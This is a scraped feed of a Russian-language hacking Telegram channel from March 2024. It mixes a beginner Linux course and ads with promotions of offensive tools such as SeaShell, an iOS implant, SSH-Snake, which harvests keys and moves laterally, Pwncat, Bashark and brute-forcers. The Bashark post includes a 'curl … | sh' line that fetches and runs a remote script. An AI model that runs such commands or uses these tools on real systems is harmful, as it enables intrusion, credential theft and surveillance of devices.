Life-Hack - Хакер

14 марта 2024 13:15

🎉УСТАЛ ЧИТАТЬ ОДНОТИПНЫЕ НОВОСТИ
┗ Надоело!?

Конечно, ведь ты не подписался на Зелёный Вестник — там Вы сможете найти информацию о:
• Самые актуальные новости.
• Приватные статьи.
• Видео контент.

⬆️ Это далеко не всё! Переходи и становись частью чего-то большего, чем просто канала:
@vestniklzt
@vestniklzt
@vestniklzt

Life-Hack - Хакер

13 марта 2024 20:21

Белые хакеры заработали 70 млн рублей за репорты об уязвимостях Яндекса в 2023 году

Хантеры отправили более 700 отчетов, за 378 из них исследователи получили денежные выплаты – там была информация об уникальных багах. Наиболее популярными ошибками стали XSS-уязвимости — для их поиска провели отдельный конкурс. Кстати, конкурсы по поиску конкретных типов багов Яндекс проводит регулярно, и во время них вознаграждение за найденную уязвимость может увеличиваться в 10 раз.

В этом году компания выделит 100 млн рублей на вознаграждение внешних исследователей – весьма неплохо.

LH | Новости | Курсы | Мемы

Life-Hack - Хакер

13 марта 2024 13:16

На первой неделе курса "Linux для новичков" мы познакомились с основами операционной системы Linux.

Мы узнали, что такое Linux, почему его выбирают и какие основные дистрибутивы существуют. Мы изучили различия способов установки Linux, а также освоили основные команды командной строки и познакомились со структурой файловой системы Linux.

Эти знания и навыки являются фундаментом для дальнейшего изучения Linux и помогут нам успешно преодолевать дальнейшие вызовы курса. Если вы что-то пропустили и желаете прочитать, то вот список материалов первой недели:

Неделя 1: Введение в Linux
• Что такое Linux и почему его выбирают?
• Основные дистрибутивы Linux: Ubuntu, Fedora, CentOS и др.
• Установка Linux: дуализм с Windows, LiveCD и виртуальные машины.
• Основные команды командной строки Linux: cd, ls, mkdir, rm и др.
• Структура файловой системы Linux: /bin, /etc, /home и др.
• Пакетный менеджер APT для установки и обновления программ.
• Основы текстового редактора nano: открытие, редактирование и сохранение файлов.

Не забывайте следить и делиться нашим бесплатным курсом "Linux для новичков"!

Следующую неделю мы посвятим теме «Работа с файлами и директориями».

LH | Новости | Курсы | Мемы

Life-Hack - Хакер

12 марта 2024 16:18

Продолжаем, погружаться в мир #Linux с нашим бесплатным теоретическим курсом "Linux для новичков"!

#статья

Первая серия материалов: "Введение в Linux"

Основы текстового редактора nano: открытие, редактирование и сохранение файлов.

LH | Новости | Курсы | Мемы

Life-Hack - Хакер

12 марта 2024 09:11

Pwncat — это мощный и гибкий инструмент для работы с оболочками, объединивший все лучшие качества классического Netcat и дополнивший их уникальными функциями.

- Pwncat обеспечивает удобное управление удалёнными оболочками.

- Этот инструмент способен автоматически обходить защиту Firewall, IDS/IPS.

- Pwncat предоставляет инструментарий для автоматического повышения привилегий.

- Он обладает высокой степенью настраиваемости, что позволяет адаптировать инструмент под индивидуальные потребности каждого пользователя.

- Pwncat предлагает методы установки постоянного соединения с удалёнными оболочками, позволяет создать "неубиваемый шелл".

LH | Новости | Курсы | Мемы

#рекомендация
#рекомендации

Life-Hack - Хакер

11 марта 2024 16:08

Совет на 2024 год: освойте Kali Linux. Тот, кто разбирается в тонкостях хакинга — сможет что угодно и сорвёт куш.

А если вы не хотите тратить время на бесполезные материалы и гайды — читайте канал: @linuxkalii

Там просто и доступно объясняют: какие утилиты защитят вашу систему от 95% атак, почему не нужно взламывать wi-fi без macchanger, как перенаправлять ваш трафик, чтобы он был полностью безопасен и многое другое.

Подписывайтесь, потом сами себе спасибо скажете: @linuxkalii

Life-Hack - Хакер

11 марта 2024 09:11

Шесть лучших инструментов для работы с прокси

1. Bloody-Proxy-Scraper - Простой инструмент для получения хороших и проверенных прокси.

2. Lunus BPS - Инструмент для получения прокси и проверки их валидности в режиме реального времени. Поддерживает HTTP/s, SOCKS4, и SOCKS5.

3. Free-proxy - Еще одна софтина на bash, работает под termux.

4. free-proxy-list - Список валидных прокси, который часто обнавляется.

5. Valid8Proxy - Инструмент, разработанный для извлечения, проверки и хранения работающих прокси.

6. ProxyKot - Быстрый поиск прокси. Поддерживает HTTP/s и SOCKS.

LH | Новости | Курсы | Мемы

#рекомендация
#рекомендации

Life-Hack - Хакер

10 марта 2024 12:14

Продолжаем, погружаться в мир #Linux с нашим бесплатным теоретическим курсом "Linux для новичков"!

#статья

Первая серия материалов: "Введение в Linux"

Структура файловой системы Linux: /bin, /etc, /home и другие.

LH | Новости | Курсы | Мемы

Life-Hack - Хакер

09 марта 2024 18:26

LH | Новости | Курсы | Мемы

Life-Hack - Хакер

09 марта 2024 09:11

SeaShell Framework - новый инструмент для эксплуатации iOS

SeaShell Framework - это платформа для последующей эксплуатации iOS, которая позволяет вам получать удаленный доступ к устройству, управлять им и извлекать конфиденциальную информацию.

Основные особенности:

— Генератор IPA - Генерирует файлы IPA, которые можно установить на целевое устройство через TrollStore или другой установщик IPA, обходящий CoreTrust.
— Мощный имплантат - SeaShell использует продвинутую полезную нагрузку под названием Pwny, которую можно дополнить своими собственными модулями или плагинами.
— Базовый набор модулей - SeaShell идет с рядом модулей, которые могут извлекать пользовательские данные, включая SMS, голосовую почту, историю Safari и многое другое.
— Зашифрованная связь - Вся коммуникация между устройством и SeaShell шифруется с использованием TLS 1.3.
— Регулярные обновления - SeaShell активно поддерживается и регулярно обновляется.

Поддерживается широкий спектр версий iOS, поскольку все они уязвимы для ошибки CoreTrust. Это может быть iOS 14, 15, 16 или ранняя версия 17. SeaShell была только что выпущена и сейчас находится в стадии бета версии.

LH | Новости | Курсы | Мемы

#рекомендация
#рекомендации

Life-Hack - Хакер

08 марта 2024 12:14

Дамы, с праздником, вас с нами мало, мы вас ценим!

LH | Новости | Курсы | Мемы

Life-Hack - Хакер

07 марта 2024 13:46

Продолжаем, погружаться в мир #Linux с нашим бесплатным теоретическим курсом "Linux для новичков"!
И сегодня поговорим про различные дистрибутивы, их плюсы и минусы.

#статья

Первая серия материалов: "Введение в Linux"

Основные дистрибутивы Linux: Ubuntu, Fedora, CentOS и другие.

LH | Новости | Курсы | Мемы

Life-Hack - Хакер

07 марта 2024 09:11

Получение мостов tor из GMail с помощью Python

#статья

С 2022 года трафик Tor стал блокироваться. И просто так, без использования мостов, подключиться к onion-сети не получиться.

Получить мосты через эту страницу, и телеграмм бота в автоматическом режиме скорее всего уже не получиться. Существует еще один, довольно интересный и не особо часто используемый метод, о котором мы рассказали в данной статье немного подробнее.

Приятного чтения!

LH | Новости | Курсы | Мемы

Life-Hack - Хакер

06 марта 2024 12:04

Друзья, приветствуем вас на нашем бесплатном теоретическом курсе "Linux для новичков"!

#Linux - это не просто операционная система, это целая философия работы с компьютерами.

В этом курсе мы с вами изучим основы работы с Linux, освоим основные команды терминала, научимся настраивать сеть и управлять пользователями.

Первая серия материалов: "Введение в Linux"

Что такое Linux и почему его выбирают?

LH | Новости | Курсы | Мемы

Life-Hack - Хакер

05 марта 2024 17:38

▶️Курс «Linux с нуля до DevOps / DevNet инженера»

Данный курс поможет вам понять, чем именно Linux отличается от других систем и оценить его преимущества для работы в сфере DevOps / DevNet. А инструкторы из Академии Cisco на платформе SEDICOMM University подскажут, как освоить новую специальность.

Смотреть курс

LH | Новости | Курсы | Мемы

Life-Hack - Хакер

14 марта 2024 09:11

Amnesiac и Bashark: Два инструмента пост-эксплуатации для Windows и Linux.

Amnesiac - это инструмент для пост-эксплуатации Windows, предназначенный для упрощения горизонтального перемещения в средах Windows. Разработанный на PowerShell, Amnesiac работает в памяти, что позволяет избежать установки и, таким образом, снижает риск обнаружения.

Этот инструмент передает команды через именованные каналы, имеет интуитивно понятный интерфейс и оснащен разнообразными модулями, упрощающими процесс тестирования.

P.S. Возможность выполнения из памяти, хоть и снижает риски быть обнаруженным, но не исключат их. Неплохая альтернатива инструментов для пост-эксплуатации, которые нужно загружать на целевую систему.

Bashark: Инструмент пост-эксплуатации для Linux

Bashark предназначен специально для операционных систем Linux и предлагает обширный набор функций, делая его полезным для специалистов по кибербезопасности.

Благодаря Bashark, вам будет проще выполнять разнообразные задачи, связанные с эксплуатацией системы, включая сбор информации, управление процессами и файлами и многое другое.

P.S. Инструмент является bash-скриптом, что дает возможность запуска без загрузки на целевую ОС и избавляет от необходимости загружать зависимости.

curl -L http://example.com/bashark.sh | sh

Life-Hack - Хакер

13 марта 2024 17:19

⭐️Курс «Kubernetes»

Данный курс охватывает аспекты Kubernetes, начиная с основ и пошагового создания локальных и облачных кластеров на разных платформах до подробного изучения ключевых компонентов и управления ими. Включает практические занятия по настройке Kubernetes, работы с Docker, созданию и использованию Helm Charts, а также изучение основных объектов Kubernetes.

Смотреть курс

LH | Новости | Курсы | Мемы

Life-Hack - Хакер

13 марта 2024 09:11

#рекомендации
#рекомендация


haccking/bOdzocHFqRF">Обзор бесплатных инструментов для реверс-инжиниринга

Life-Hack - Хакер

12 марта 2024 12:14

Грубая сила. Брутим RDP, SSH, VNC, Instagram и стандартные формы веб-аутентификации

#статья

Часто при проведении тестирования применяется брутфорс или, другими словами, метод "грубой силы". С помощью этой атаки взломщики могут получить несанкционированный доступ к административной панели веб-сайта, учетной записи пользователя или другой вид доступа с помощью различных протоколов.

В этой статье мы разберём инструмент для брутфорса - Crowbar и ещё два полезных брутфорсера для более узконаправленных задач.

Приятного чтения!

LH | Новости | Курсы | Мемы

Life-Hack - Хакер

11 марта 2024 17:08

Продолжаем, погружаться в мир #Linux с нашим бесплатным теоретическим курсом "Linux для новичков"!

#статья

Первая серия материалов: "Введение в Linux"

Пакетный менеджер APT для установки и обновления программ.

LH | Новости | Курсы | Мемы

Life-Hack - Хакер

11 марта 2024 12:24

Начало Aircrack-ng и WEF

#статья

Думаю не секрет, что довольно многие начинали свой путь в ИБ с вопроса "Как взломать Wi-Fi соседа?", а дальше углублялись в эту тему и находили что-то намного интересней чем просто бесплатный интернет.

В этой статье вы познакомитесь с Aircrack-ng и ещё одним удобным инструментом вардрайвинга - WEF (WiFi Exploitation Framework). Так же мы разберем все базовые атаки на беспроводные точки доступа.

Ссылка на статью

LH | Новости | Курсы | Мемы

Life-Hack - Хакер

10 марта 2024 15:17

🔑Default Credentials Cheat Sheet

Репозиторий, где собрано огромное количество стандартных комбинаций логин/пароль, используемых на множестве устройств и сервисов.

P.S. Полезно как для проверки безопасности, так и для атакующей команды.

Ссылка на GitHub

LH | Новости | Курсы | Мемы

#рекомендация
#рекомендации

Life-Hack - Хакер

10 марта 2024 09:11

Топ популярных постов за прошедшую неделю (сохрани себе и отправь другу):

1. Предыдущий топ статей
2. Обратная Сторона Кода: Глубокое Погружение в Мир Вредоносного ПО
3. Установка и настройка tor в Linux Mint
4. BEE·bot — рекурсивный интернет-сканер для хакеров
5. SSH-Snake - это мощный инструмент, предназначенный для автоматического обхода сети с использованием закрытых ключей SSH.
6. Получение мостов tor из GMail с помощью Python


#подборка

LH | Новости | Курсы | Мемы

Life-Hack - Хакер

09 марта 2024 12:41

Продолжаем, погружаться в мир #Linux с нашим бесплатным теоретическим курсом "Linux для новичков"!

#статья

Первая серия материалов: "Введение в Linux"

Основные команды командной строки Linux: cd, ls, mkdir, rm и другие.

LH | Новости | Курсы | Мемы

Life-Hack - Хакер

08 марта 2024 15:17

Продолжаем, погружаться в мир #Linux с нашим бесплатным теоретическим курсом "Linux для новичков"!

#статья

Первая серия материалов: "Введение в Linux"

Установка Linux: дуализм с Windows, LiveCD и виртуальные машины.

LH | Новости | Курсы | Мемы

Life-Hack - Хакер

08 марта 2024 09:11

Anti-Debug Tricks

Эта энциклопедия содержит описание приемов антиотладки, которые работают в последних версиях Windows с помощью самых популярных отладчиков (таких как OllyDbg, WinDbg, x64dbg).

LH | Новости | Курсы | Мемы

#рекомендация
#рекомендации

Life-Hack - Хакер

07 марта 2024 12:41

Erid: 2VfnxwDDSSt

Хакеры буквально пытались взломать этот вебинар про контейнерные технологии от команды PT Container Security. На какой минуте произошел инцидент и как он повлиял на эфир?

Заходи в Telegram-канал продукта, смотри вебинар и ищи багу 😏

Life-Hack - Хакер

06 марта 2024 15:39

SSH-Snake - это мощный инструмент, предназначенный для автоматического обхода сети с использованием закрытых ключей SSH. С целью создания карты сети и определения того, до какой степени сеть может быть скомпрометирована с использованием ключей SSH, начиная с конкретной системы.

Принцип работы:
1. Найти на текущей машине все приватные ssh-ключи
2. Просканировать сеть и найти живые хосты, к которым можно подключиться.
3. Попытаться подключиться к хостам с ключами, найденными в первом пункте.
4. После подключения к новому устройству, повторить все шаги, начиная с первого.

Возможности:
— переходит от одной системы к другой только с помощью bash и stdin, не создавая никаких файлов
— как только попал на новую систему, автоматически пытается повыситься до рута, используя sudo
— ищет закрытые ключи в часто используемых файлах и папках, обход гибко настраивается
— обнаруживает узлы по диапазонам IP-адресов, известным хостам
— запоминает, какие машины уже были просканированы, чтобы не подключаться к ним снова
— генерирует графическую карту сети из выходных данных скрипта и сохраняет все приватные ключи

Ссылка на GitHub

Подробнее тут!

LH | Новости | Курсы | Мемы

#рекомендация
#рекомендации

Life-Hack - Хакер

06 марта 2024 09:11

Прикладной курс WAPT – запись до 11 марта!

0% воды / 80% практики и изучения современных видов атак за 2023 – 2024

👨💻Ваши навыки после 4 месяцев курса: 

- нахождение и эксплуатация всех актуальных типов уязвимостей
- разведка и сбор информации о системе из открытых источников
- взлом веб-приложений: SQL Injection и CMD Injection, Cross Site Scripting, PHP injection, Server Side Template injection
- знание техник повышения привилегий и социальной инженерии

На 100% практический курс проходит в режиме лаборатории, где вы руками попробуете изученные техники взлома. Лаборатория содержит более 100+ рабочих тасков и развернута на платформе 5 ТБ.

Учитесь у лучших! Курс подготовлен командой Codeby, топ-1 по этичному хакингу и 5-кратными чемпионами the Standoff

Пишите нам @Codeby_Academy
или звоните +74994441750

Life-Hack - Хакер

05 марта 2024 13:48

Перечислить всех. Красота русских фамилий как фактор уязвимости в пентестах Active Directory

#статья

В блоге кооператива RAD COP на Habr вышла статья, посвященная перечислению пользователей в Active Directory. Как же мы можем увеличить число найденных учетных записей и усилить наши шансы на подбор пароля в результате Password Spray атаки, если OSINT не принес желаемого результата?

Статья примечательна тем, что для генерации словарей используется избыточность русских фамилий и небезопасные паттерн имен учетных записей Active Directory. Также приводятся примеры векторов атак для OWA (Outlook) с внешнего периметра и Kerberos для внутреннего.

Подробней тут!

LH | Новости | Курсы | Мемы